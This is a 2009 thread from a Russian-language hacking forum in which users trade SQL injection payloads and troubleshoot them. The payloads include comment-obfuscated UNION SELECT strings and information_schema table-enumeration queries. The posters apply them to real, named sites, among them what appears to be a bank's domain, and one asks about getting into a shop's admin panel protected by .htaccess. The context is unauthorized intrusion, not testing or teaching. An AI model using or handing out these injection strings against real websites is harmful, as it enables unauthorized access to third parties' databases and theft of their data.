ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

08.11.2009, 11:39
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Сообщение от HAXTA4OK
Проще говоря у тебя Blind sql-inj (слепая скуля)
то есть sql-inj есть но без вывода
Есть там вывод...
Сообщение от warlok
а ты видиш принтабильное поле через которое можно вывести данные? мм кстате недавно в хакере писали про вывод данных через ошибки но если неошибась это прокатит только в 5 ветке
Можно и через ошибку...
|
|
|

08.11.2009, 01:44
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
mr.celt
а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
|
|
|

08.11.2009, 01:48
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме: 189458
Репутация:
10
|
|
Сообщение от B1t.exe
mr.celt
а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
пробуй:
id=-1/**/unION/**/selECT/**/1,2,3--+
И вообще, читай больше инфи
---
ксс может быть не только в поиске..
|
|
|

08.11.2009, 02:11
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
пробуй:
id=-1/**/unION/**/selECT/**/1,2,3--+
если пробовать вот так:
http://www.site.ru/ ?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.site.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Ошибка доступа 404 к указанной странице
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
|
|
|

08.11.2009, 02:14
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме: 189458
Репутация:
10
|
|
Сообщение от B1t.exe
если пробовать вот так:
http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.welcome-bank.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
блин, я даже не знаю как тебе объяснить
1) очень быстро перешел на такий сайты
2) читай мануалы!
Тебе в этой теме уже рассказали что читать и делать!
Последний раз редактировалось [Forest]; 08.11.2009 в 02:18..
|
|
|

08.11.2009, 04:14
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме: 1483264
Репутация:
131
|
|
Делая запрос:
union+select+1,2,3,4,5,6,7,8,9,group_concat(table_ name),11+from+information_schema.tables
Выдаёт
что не так? 
Последний раз редактировалось DeluxeS; 08.11.2009 в 04:26..
|
|
|

08.11.2009, 08:45
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от DeluxeS
Делая запрос:
Выдаёт
что не так? 
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1
Не?
|
|
|

08.11.2009, 08:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
DeluxeS
ну скажем так штатный экстрасенс работает сейчас в разделе инклюдов... можно линк в студию?
и зачем тебе использовать здесь concat?
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1
или же делaй запрос без concat-a ... или же попробуй так
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,tabl e_name,table_schema),11+from+information_schema.ta bles+li mit+1,1
Последний раз редактировалось Gorev; 08.11.2009 в 09:00..
|
|
|

08.11.2009, 08:19
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
vot posmotrite http://www.vashstile.ru/admin zdes kak to .htacces..
esli napisu login i parol pravilno moqu zayti v admin panel??
|
|
|

08.11.2009, 09:02
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
a moy vopros??
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|